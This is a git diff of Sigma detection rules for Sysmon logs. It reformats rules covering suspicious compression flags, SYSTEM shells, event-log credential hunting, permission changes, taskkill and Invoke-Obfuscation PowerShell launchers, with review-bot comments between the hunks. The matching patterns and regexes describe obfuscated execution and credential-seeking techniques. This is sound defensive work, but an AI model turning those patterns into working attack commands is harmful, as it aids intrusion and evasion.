diff --git a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_susp_compression_params.yml b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_susp_compression_params.yml index 8b8386f82..c5188e9a4 100644 --- a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_susp_compression_params.yml +++ b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_susp_compression_params.yml @@ -1,8 +1,7 @@ title: Potentially Suspicious Compression Tool Parameters id: 27a72a60-7e5e-47b1-9d17-909c9abafdcd status: test -description: Detects potentially suspicious command line arguments of common data - compression tools +description: Detects potentially suspicious command line arguments of common data compression tools references: - https://twitter.com/SBousseaden/status/1184067445612535811 author: Florian Roth (Nextron Systems), Samir Bousseaden @@ -25,7 +24,7 @@ detection: - 7z*.exe - '*rar.exe' - '*Command*Line*RAR*' - CommandLine|contains: + CommandLine|contains: - ' -p' - ' -ta' - ' -tb' diff --git a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_susp_elevated_system_shell.yml b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_susp_elevated_system_shell.yml index 2ad637111..33a529e6d 100644 --- a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_susp_elevated_system_shell.yml +++ b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_susp_elevated_system_shell.yml 
@@ -1,14 +1,11 @@ title: Elevated System Shell Spawned id: 61065c72-5d7d-44ef-bf41-6a36684b545f related: - - id: 178e615d-e666-498b-9630-9ed363038101 - type: similar + - id: 178e615d-e666-498b-9630-9ed363038101 + type: similar status: experimental -description: 'Detects when a shell program such as the Windows command prompt or PowerShell - is launched with system privileges. Use this rule to hunt for potential suspicious - processes. - - ' +description: | + Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges. Use this rule to hunt for potential suspicious processes. references: - https://github.com/Wh04m1001/SysmonEoP author: Nasreddine Bencherchali (Nextron Systems), frack113 @@ -28,16 +25,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_shell: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - \cmd.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll - - Cmd.Exe + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - \cmd.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll + - Cmd.Exe selection_user: - User|contains: + User|contains: # covers many language settings - AUTHORI - AUTORI LogonId: '0x3e7' diff --git a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_susp_event_log_query.yml b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_susp_event_log_query.yml index 65d888497..8a6bdef79 100644 --- a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_susp_event_log_query.yml +++ b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_susp_event_log_query.yml 
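Review bot: `selection_user` now documents the `User|contains` list but leaves the `LogonId: '0x3e7'` constant unexplained, even though it is the part of the selection that actually pins the SYSTEM context. Suggest `LogonId: '0x3e7' # 999 - the well-known LUID of the SYSTEM logon session`, and expanding the user comment to `# "AUTHORI"/"AUTORI" cover localized spellings of NT AUTHORITY (e.g. English, French, German)` so readers know which strings the substrings stand for. The rest of the hunk is indentation and description reflow.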
@@ -1,14 +1,11 @@ title: EventLog Query Requests By Builtin Utilities id: 9cd55b6c-430a-4fa9-96f4-7cadf5229e9f related: - - id: beaa66d6-aa1b-4e3c-80f5-e0145369bfaf - type: derived + - id: beaa66d6-aa1b-4e3c-80f5-e0145369bfaf + type: derived status: experimental -description: 'Detect attempts to query the contents of the event log using command - line utilities. Attackers use this technique in order to look for sensitive information - in the logs such as passwords, usernames, IPs, etc. - - ' +description: | + Detect attempts to query the contents of the event log using command line utilities. Attackers use this technique in order to look for sensitive information in the logs such as passwords, usernames, IPs, etc. references: - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.diagnostics/get-winevent?view=powershell-7.3 - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-eventlog?view=powershell-5.1 
@@ -29,27 +26,26 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_wmi: - CommandLine|contains|all: + CommandLine|contains|all: - Select - Win32_NTLogEvent selection_wevtutil_img: - - Image|endswith: \wevtutil.exe - - OriginalFileName: wevtutil.exe + - Image|endswith: \wevtutil.exe + - OriginalFileName: wevtutil.exe selection_wevtutil_cli: - CommandLine|contains: + CommandLine|contains: - ' qe ' - ' query-events ' selection_wmic_img: - - Image|endswith: \wevtutil.exe - - OriginalFileName: wevtutil.exe + - Image|endswith: \wevtutil.exe + - OriginalFileName: wevtutil.exe selection_wmic_cli: - CommandLine|contains: ' ntevent' + CommandLine|contains: ' ntevent' selection_cmdlet: - CommandLine|contains: + CommandLine|contains: - 'Get-WinEvent ' - 'get-eventlog ' - condition: process_creation and (selection_wmi or all of selection_wevtutil_* - or all of selection_wmic_* or selection_cmdlet) + condition: process_creation and (selection_wmi or all of selection_wevtutil_* or all of selection_wmic_* or selection_cmdlet) falsepositives: - Legitimate log access by administrators or troubleshooting tools level: medium diff --git a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_susp_file_permission_modifications.yml b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_susp_file_permission_modifications.yml index c676d9594..72e3eed4f 100644 --- a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_susp_file_permission_modifications.yml +++ b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_susp_file_permission_modifications.yml 
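Review bot: `selection_wmic_img` is a copy of `selection_wevtutil_img` and matches `\wevtutil.exe` / `wevtutil.exe`, while `selection_wmic_cli` requires `' ntevent'`, which is a WMIC alias; because the condition uses `all of selection_wmic_*`, that branch can never fire for a real `wmic ntevent` query and `wevtutil` never carries that argument, so the reindent preserves a dead branch. Suggest `- Image|endswith: \wmic.exe` and `- OriginalFileName: wmic.exe` for `selection_wmic_img`, matching the identifiers used in `proc_creation_win_wmic_recon_system_info.yml` elsewhere in this patch. The `condition` reflow itself is correct and unchanged in logic.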
@@ -25,31 +25,29 @@ detection: Image|endswith: - \cacls.exe - \icacls.exe - - \net.exe - - \net1.exe - CommandLine|contains: + - \net.exe # "grant" Option available when used with "net share" + - \net1.exe # "grant" Option available when used with "net share" + CommandLine|contains: - /grant - /setowner - - /inheritance:r + - /inheritance:r # Remove all inherited ACEs selection_2: Image|endswith: \attrib.exe - CommandLine|contains: -r + CommandLine|contains: -r selection_3: - Image|endswith: \takeown.exe + Image|endswith: \takeown.exe # If this generates FP in your environment. Comment it out or add more suspicious flags and locations filter_optional_dynatrace_1: - CommandLine|endswith: ICACLS C:\ProgramData\dynatrace\gateway\config\connectivity.history - /reset + CommandLine|endswith: ICACLS C:\ProgramData\dynatrace\gateway\config\connectivity.history /reset filter_optional_dynatrace_2: - CommandLine|contains|all: - - 'ICACLS C:\ProgramData\dynatrace\gateway\config\config.properties /grant - :r ' + CommandLine|contains|all: + - 'ICACLS C:\ProgramData\dynatrace\gateway\config\config.properties /grant :r ' - S-1-5-19:F filter_optional_vscode: - CommandLine|contains: + CommandLine|contains: - \AppData\Local\Programs\Microsoft VS Code - :\Program Files\Microsoft VS Code filter_optional_avira: - CommandLine|contains: + CommandLine|contains: - :\Program Files (x86)\Avira - :\Program Files\Avira condition: process_creation and (1 of selection_* and not 1 of filter_optional_*) diff --git a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_taskkill_execution.yml b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_taskkill_execution.yml index 9a7484f3e..47d9b9b51 100644 --- a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_taskkill_execution.yml +++ b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_taskkill_execution.yml 
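Review bot: The new comment on `selection_3` is two sentence fragments ("If this generates FP in your environment. Comment it out or ..."), and it does not say that the selection matches every `takeown.exe` execution, which is what makes it noisy. Suggest `# Note: Matches every takeown.exe execution. If this is too noisy in your environment, comment it out or add suspicious flags/locations`. Separately, `CommandLine|contains: -r` under `selection_2` matches the substring anywhere in the command line, including inside file or directory names such as `C:\my-report\` (constructed example); `' -r'` with a leading space still matches the attrib flag syntax and is less prone to this kind of false positive.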
@@ -1,14 +1,9 @@ title: Process Terminated Via Taskkill id: 86085955-ea48-42a2-9dd3-85d4c36b167d status: experimental -description: 'Detects execution of "taskkill.exe" in order to stop a service or a - process. Look for suspicious parents executing this command in order to hunt for - potential malicious activity. - - Attackers might leverage this in order to conduct data destruction or data encrypted - for impact on the data stores of services like Exchange and SQL Server. - - ' +description: | + Detects execution of "taskkill.exe" in order to stop a service or a process. Look for suspicious parents executing this command in order to hunt for potential malicious activity. + Attackers might leverage this in order to conduct data destruction or data encrypted for impact on the data stores of services like Exchange and SQL Server. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1489/T1489.md#atomic-test-3---windows---stop-service-by-killing-process author: frack113 @@ -27,10 +22,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \taskkill.exe - - OriginalFileName: taskkill.exe + - Image|endswith: \taskkill.exe + - OriginalFileName: taskkill.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' /f' - ' /im ' filter_main_installers: @@ -40,7 +35,6 @@ detection: ParentImage|endswith: .tmp condition: process_creation and (all of selection_* and not 1 of filter_main_*) falsepositives: - - Expected FP with some processes using this techniques to terminate one of their - processes during installations and updates + - Expected FP with some processes using this techniques to terminate one of their processes during installations and updates level: low ruletype: Sigma 
diff --git a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_wmic_recon_system_info.yml b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_wmic_recon_system_info.yml index 09c9aa448..f9112e7e0 100644 --- a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_wmic_recon_system_info.yml +++ b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_wmic_recon_system_info.yml @@ -1,18 +1,13 @@ title: System Information Discovery Via Wmic.EXE id: d85ecdd7-b855-4e6e-af59-d9c78b5b861e related: - - id: 9d5a1274-922a-49d0-87f3-8c653483b909 - type: derived + - id: 9d5a1274-922a-49d0-87f3-8c653483b909 + type: derived status: experimental -description: 'Detects the use of the WMI command-line (WMIC) utility to identify and - display various system information, - - including OS, CPU, GPU, disk drive names, memory capacity, display resolution, - baseboard, BIOS, - +description: | + Detects the use of the WMI command-line (WMIC) utility to identify and display various system information, + including OS, CPU, GPU, disk drive names, memory capacity, display resolution, baseboard, BIOS, and GPU driver products/versions. - - ' references: - https://github.com/redcanaryco/atomic-red-team/blob/a2ccd19c37d0278b4ffa8583add3cf52060a5418/atomics/T1082/T1082.md#atomic-test-25---system-information-discovery-with-wmic - https://nwgat.ninja/getting-system-information-with-wmic-on-windows/ @@ -36,13 +31,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_wmic: - - Description: WMI Commandline Utility - - OriginalFileName: wmic.exe - - Image|endswith: \WMIC.exe + - Description: WMI Commandline Utility + - OriginalFileName: wmic.exe + - Image|endswith: \WMIC.exe selection_get: - CommandLine|contains: get + CommandLine|contains: get selection_classes: - CommandLine|contains: + CommandLine|contains: - baseboard - bios - cpu 
@@ -54,7 +49,7 @@ detection: - startup - win32_videocontroller selection_attributes: - CommandLine|contains: + CommandLine|contains: - caption - command - driverversion @@ -71,5 +66,6 @@ detection: condition: process_creation and (all of selection_* and not 1 of filter_optional_*) falsepositives: - VMWare Tools serviceDiscovery scripts +# Note: Might be upgraded to a medium detection rules after some time level: low ruletype: Sigma diff --git a/sigma/sysmon/threat-hunting/registry/registry_set/registry_set_office_trusted_location.yml b/sigma/sysmon/threat-hunting/registry/registry_set/registry_set_office_trusted_location.yml index 524d7d7b6..f7aeac039 100644 --- a/sigma/sysmon/threat-hunting/registry/registry_set/registry_set_office_trusted_location.yml +++ b/sigma/sysmon/threat-hunting/registry/registry_set/registry_set_office_trusted_location.yml @@ -1,12 +1,10 @@ title: Microsoft Office Trusted Location Updated id: a0bed973-45fa-4625-adb5-6ecdf9be70ac related: - - id: f742bde7-9528-42e5-bd82-84f51a8387d2 - type: similar + - id: f742bde7-9528-42e5-bd82-84f51a8387d2 + type: similar status: experimental -description: Detects changes to the registry keys related to "Trusted Location" of - Microsoft Office. Attackers might add additional trusted locations to avoid macro - security restrictions. +description: Detects changes to the registry keys related to "Trusted Location" of Microsoft Office. Attackers might add additional trusted locations to avoid macro security restrictions. references: - https://admx.help/?Category=Office2016&Policy=excel16.Office.Microsoft.Policies.Windows::L_TrustedLoc01 author: Nasreddine Bencherchali (Nextron Systems) 
@@ -36,7 +34,6 @@ detection: - :\Program Files (x86)\Microsoft Office\ condition: registry_set and (selection and not 1 of filter_main_*) falsepositives: - - During office installations or setup, trusted locations are added, which will - trigger this rule. + - During office installations or setup, trusted locations are added, which will trigger this rule. level: medium ruletype: Sigma diff --git a/sigma/sysmon/threat-hunting/registry/registry_set/registry_set_powershell_crypto_namespace.yml b/sigma/sysmon/threat-hunting/registry/registry_set/registry_set_powershell_crypto_namespace.yml index 196d50826..608366673 100644 --- a/sigma/sysmon/threat-hunting/registry/registry_set/registry_set_powershell_crypto_namespace.yml +++ b/sigma/sysmon/threat-hunting/registry/registry_set/registry_set_powershell_crypto_namespace.yml @@ -1,15 +1,10 @@ title: Registry Set With Crypto-Classes From The "Cryptography" PowerShell Namespace id: 1c2a3268-3881-414a-80af-a5b313b14c0e status: experimental -description: 'Detects the setting of a registry inside the "\Shell\Open\Command" value - with PowerShell classes from the "System.Security.Cryptography" namespace. - - The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly - encryption and decryption. - +description: | + Detects the setting of a registry inside the "\Shell\Open\Command" value with PowerShell classes from the "System.Security.Cryptography" namespace. + The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption. These can be used for example in decrypting malicious payload for defense evasion. - - ' references: - https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography?view=net-8.0 - https://squiblydoo.blog/2023/11/07/october-2023-solarmarker/ 
@@ -30,7 +25,7 @@ detection: EventID: 13 Channel: Microsoft-Windows-Sysmon/Operational selection_key: - EventType: SetValue + EventType: SetValue TargetObject|contains: \Shell\Open\Command selection_value_img: Details|contains: @@ -49,7 +44,6 @@ detection: - .TripleDESCryptoServiceProvider condition: registry_set and (all of selection_*) falsepositives: - - Classes are legitimately used, but less so when e.g. parents with low prevalence - or decryption of content in temporary folders. + - Classes are legitimately used, but less so when e.g. parents with low prevalence or decryption of content in temporary folders. level: medium ruletype: Sigma diff --git a/sigma/sysmon/unsupported/dns_query_win_possible_dns_rebinding.yml b/sigma/sysmon/unsupported/dns_query_win_possible_dns_rebinding.yml index e032f471a..bbbbfa677 100644 --- a/sigma/sysmon/unsupported/dns_query_win_possible_dns_rebinding.yml +++ b/sigma/sysmon/unsupported/dns_query_win_possible_dns_rebinding.yml @@ -1,9 +1,7 @@ title: Possible DNS Rebinding id: eb07e747-2552-44cd-af36-b659ae0958e4 status: unsupported -description: Detects several different DNS-answers by one domain with IPs from internal - and external networks. Normally, DNS-answer contain TTL >100. (DNS-record will - saved in host cache for a while TTL). +description: Detects several different DNS-answers by one domain with IPs from internal and external networks. Normally, DNS-answer contain TTL >100. (DNS-record will saved in host cache for a while TTL). references: - https://medium.com/@brannondorsey/attacking-private-networks-from-the-internet-with-dns-rebinding-ea7098a2d325 author: Ilyas Ochkov, oscd.community 
@@ -45,7 +43,6 @@ detection: - (::ffff:)?172.31. - (::ffff:)?127. timeframe: 30s - condition: (dns_query and (dns_answer and filter_int_ip) and (dns_answer and not - filter_int_ip)) | count(QueryName) by ComputerName > 3 + condition: (dns_query and (dns_answer and filter_int_ip) and (dns_answer and not filter_int_ip)) | count(QueryName) by ComputerName > 3 level: medium ruletype: Sigma diff --git a/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_clip+_services.yml b/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_clip+_services.yml index f0dc51383..adf9e74d6 100644 --- a/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_clip+_services.yml +++ b/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_clip+_services.yml @@ -1,15 +1,15 @@ title: Invoke-Obfuscation CLIP+ Launcher id: 21e4b3c1-4985-4aa4-a6c0-f8639590a5f3 related: - - id: f7385ee2-0e0c-11eb-adc1-0242ac120002 - type: derived + - id: f7385ee2-0e0c-11eb-adc1-0242ac120002 + type: derived description: Detects Obfuscated use of Clip.exe to execute PowerShell status: unsupported author: Jonathan Cheong, oscd.community date: 2020/10/13 modified: 2021/09/16 references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 #(Task 26) tags: - attack.defense_evasion - attack.t1027 diff --git a/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_obfuscated_iex_services.yml b/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_obfuscated_iex_services.yml index c82a0c6c2..8dc147323 100644 --- a/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_obfuscated_iex_services.yml +++ b/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_obfuscated_iex_services.yml 
@@ -1,10 +1,9 @@ title: Invoke-Obfuscation Obfuscated IEX Invocation id: e75c48bd-3434-4d61-94b7-ddfaa2c08487 related: - - id: 51aa9387-1c53-4153-91cc-d73c59ae1ca9 - type: derived -description: Detects all variations of obfuscated powershell IEX invocation code generated - by Invoke-Obfuscation framework (See reference section for code block) + - id: 51aa9387-1c53-4153-91cc-d73c59ae1ca9 + type: derived +description: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework (See reference section for code block) references: - https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888 status: unsupported @@ -23,13 +22,13 @@ detection: EventID: 6 Channel: Microsoft-Windows-Sysmon/Operational selection: - - ImagePath|re: \$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[ - - ImagePath|re: \$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[ - - ImagePath|re: \$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[ - - ImagePath|re: \$env:ComSpec\[(\s*\d{1,3}\s*,){2} - - ImagePath|re: \\*mdr\*\W\s*\)\.Name - - ImagePath|re: \$VerbosePreference\.ToString\( - - ImagePath|re: \String\]\s*\$VerbosePreference + - ImagePath|re: \$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[ + - ImagePath|re: \$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[ + - ImagePath|re: \$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[ + - ImagePath|re: \$env:ComSpec\[(\s*\d{1,3}\s*,){2} + - ImagePath|re: \\*mdr\*\W\s*\)\.Name + - ImagePath|re: \$VerbosePreference\.ToString\( + - ImagePath|re: \String\]\s*\$VerbosePreference condition: driver_load and selection falsepositives: - Unknown diff --git a/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_stdin+_services.yml b/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_stdin+_services.yml index 9a845c096..fb7ac33b4 100644 --- a/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_stdin+_services.yml 
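Review bot: The re-indented selection under `EventID: 6` / `Channel: Microsoft-Windows-Sysmon/Operational` keys every alternative on `ImagePath|re:`, but as far as I know Sysmon's Driver Loaded event (ID 6) reports the driver path in `ImageLoaded` and carries no `ImagePath` field at all, so none of the seven regexes can match on this log source; `ImagePath` is a field of the System-log service-installation event these rules appear to derive from. The rule is already `status: unsupported`, which may be for exactly this reason, but nothing in the file says so and a reader may assume the conversion is merely untested. I would add `# NOTE: Sysmon EID 6 has no ImagePath field (driver path is ImageLoaded); as written this selection cannot fire on this log source` directly above `selection:`. The same field mismatch applies to the `ImagePath` selections in the VAR++ LAUNCHER OBFUSCATION hunk and the Meterpreter/Cobalt Strike Getsystem Service Installation hunk further down.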
+++ b/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_stdin+_services.yml @@ -1,15 +1,15 @@ title: Invoke-Obfuscation STDIN+ Launcher id: de7fb680-6efa-4bf3-af2c-14b6d33c8e6e related: - - id: 72862bf2-0eb1-11eb-adc1-0242ac120002 - type: derived + - id: 72862bf2-0eb1-11eb-adc1-0242ac120002 + type: derived description: Detects Obfuscated use of stdin to execute PowerShell status: unsupported author: Jonathan Cheong, oscd.community date: 2020/10/15 modified: 2021/09/17 references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 #(Task 25) tags: - attack.defense_evasion - attack.t1027 diff --git a/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_var+_services.yml b/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_var+_services.yml index cd7a303ae..7d84ef66e 100644 --- a/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_var+_services.yml +++ b/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_var+_services.yml @@ -1,15 +1,15 @@ title: Invoke-Obfuscation VAR+ Launcher id: 3e27b010-2cf2-4577-8ef0-3ea44aaea0dc related: - - id: 8ca7004b-e620-4ecb-870e-86129b5b8e75 - type: derived + - id: 8ca7004b-e620-4ecb-870e-86129b5b8e75 + type: derived description: Detects Obfuscated use of Environment Variables to execute PowerShell status: unsupported author: Jonathan Cheong, oscd.community date: 2020/10/15 modified: 2021/09/17 references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 #(Task 24) tags: - attack.defense_evasion - attack.t1027 @@ -29,4 +29,5 @@ detection: falsepositives: - Unknown level: high + ruletype: Sigma diff --git a/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_compress_services.yml b/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_compress_services.yml index 66969a44d..41bcf9f67 100644 --- a/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_compress_services.yml 
+++ b/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_compress_services.yml @@ -1,15 +1,15 @@ title: Invoke-Obfuscation COMPRESS OBFUSCATION id: c70731dd-0097-40ff-b112-f7032f29c16c related: - - id: 175997c5-803c-4b08-8bb0-70b099f47595 - type: derived + - id: 175997c5-803c-4b08-8bb0-70b099f47595 + type: derived description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION status: unsupported author: Timur Zinniatullin, oscd.community date: 2020/10/18 modified: 2023/03/04 references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 #(Task 19) logsource: product: windows category: driver_load diff --git a/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_rundll_services.yml b/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_rundll_services.yml index c2d1b32af..4ac7cf86e 100644 --- a/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_rundll_services.yml +++ b/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_rundll_services.yml @@ -1,15 +1,15 @@ title: Invoke-Obfuscation RUNDLL LAUNCHER id: 03b024c6-aad1-4da5-9f60-e9e8c00fa64c related: - - id: 11b52f18-aaec-4d60-9143-5dd8cc4706b9 - type: derived + - id: 11b52f18-aaec-4d60-9143-5dd8cc4706b9 + type: derived description: Detects Obfuscated Powershell via RUNDLL LAUNCHER status: unsupported author: Timur Zinniatullin, oscd.community date: 2020/10/18 modified: 2022/03/08 references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 #(Task 23) logsource: product: windows category: driver_load diff --git a/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_stdin_services.yml b/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_stdin_services.yml index 85d81249e..8538df793 100644 --- a/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_stdin_services.yml +++ b/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_stdin_services.yml 
@@ -1,15 +1,15 @@ title: Invoke-Obfuscation Via Stdin id: 82b66143-53ee-4369-ab02-de2c70cd6352 related: - - id: 487c7524-f892-4054-b263-8a0ace63fc25 - type: derived + - id: 487c7524-f892-4054-b263-8a0ace63fc25 + type: derived description: Detects Obfuscated Powershell via Stdin in Scripts status: unsupported author: Nikita Nazarov, oscd.community date: 2020/10/12 modified: 2023/04/23 references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 #(Task28) tags: - attack.defense_evasion - attack.t1027 diff --git a/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_use_clip_services.yml b/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_use_clip_services.yml index 314a9e836..ff65ca69f 100644 --- a/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_use_clip_services.yml +++ b/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_use_clip_services.yml @@ -1,15 +1,15 @@ title: Invoke-Obfuscation Via Use Clip id: 1fc02cb5-8acf-4d2c-bf9c-a28b6e0ad851 related: - - id: 63e3365d-4824-42d8-8b82-e56810fefa0c - type: derived + - id: 63e3365d-4824-42d8-8b82-e56810fefa0c + type: derived description: Detects Obfuscated Powershell via use Clip.exe in Scripts status: unsupported author: Nikita Nazarov, oscd.community date: 2020/10/09 modified: 2022/04/26 references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 #(Task29) tags: - attack.defense_evasion - attack.t1027 diff --git a/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_use_mshta_services.yml b/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_use_mshta_services.yml index 2b6809639..0c76278bc 100644 --- a/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_use_mshta_services.yml +++ b/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_use_mshta_services.yml 
@@ -1,15 +1,15 @@ title: Invoke-Obfuscation Via Use MSHTA id: a4e82ad2-7430-4ee8-b858-6ad6099773fa related: - - id: 7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4 - type: derived + - id: 7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4 + type: derived description: Detects Obfuscated Powershell via use MSHTA in Scripts status: unsupported author: Nikita Nazarov, oscd.community date: 2020/10/09 modified: 2022/03/08 references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 #(Task31) logsource: product: windows category: driver_load diff --git a/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_use_rundll32_services.yml b/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_use_rundll32_services.yml index 6cbdb5d34..a117ce19c 100644 --- a/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_use_rundll32_services.yml +++ b/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_use_rundll32_services.yml @@ -1,15 +1,15 @@ title: Invoke-Obfuscation Via Use Rundll32 id: 4e1518d9-2136-4015-ab49-c31d7c8588e1 related: - - id: 641a4bfb-c017-44f7-800c-2aee0184ce9b - type: derived + - id: 641a4bfb-c017-44f7-800c-2aee0184ce9b + type: derived description: Detects Obfuscated Powershell via use Rundll32 in Scripts status: unsupported author: Nikita Nazarov, oscd.community date: 2020/10/09 modified: 2022/03/08 references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 #(Task30) logsource: product: windows category: driver_load diff --git a/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_var++_services.yml b/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_var++_services.yml index 8b2fafdc5..574263c3a 100644 --- a/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_var++_services.yml +++ b/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_via_var++_services.yml 
@@ -1,15 +1,15 @@ title: Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION id: 7b9a650e-6788-4fdf-888d-ec7c0a62810d related: - - id: 14bcba49-a428-42d9-b943-e2ce0f0f7ae6 - type: derived + - id: 14bcba49-a428-42d9-b943-e2ce0f0f7ae6 + type: derived description: Detects Obfuscated Powershell via VAR++ LAUNCHER status: unsupported author: Timur Zinniatullin, oscd.community date: 2020/10/13 modified: 2021/09/18 references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 #(Task27) tags: - attack.defense_evasion - attack.t1027 @@ -24,7 +24,7 @@ detection: EventID: 6 Channel: Microsoft-Windows-Sysmon/Operational selection: - ImagePath|re: (?i).*&&set.*(\{\d\}){2,}\\\"\s+?\-f.*&&.*cmd.*\/c + ImagePath|re: (?i).*&&set.*(\{\d\}){2,}\\\"\s+?\-f.*&&.*cmd.*\/c # FPs with |\/r condition: driver_load and selection falsepositives: - Unknown diff --git a/sigma/sysmon/unsupported/driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml b/sigma/sysmon/unsupported/driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml index 11fc5d477..91620b9c8 100644 --- a/sigma/sysmon/unsupported/driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml +++ b/sigma/sysmon/unsupported/driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml 
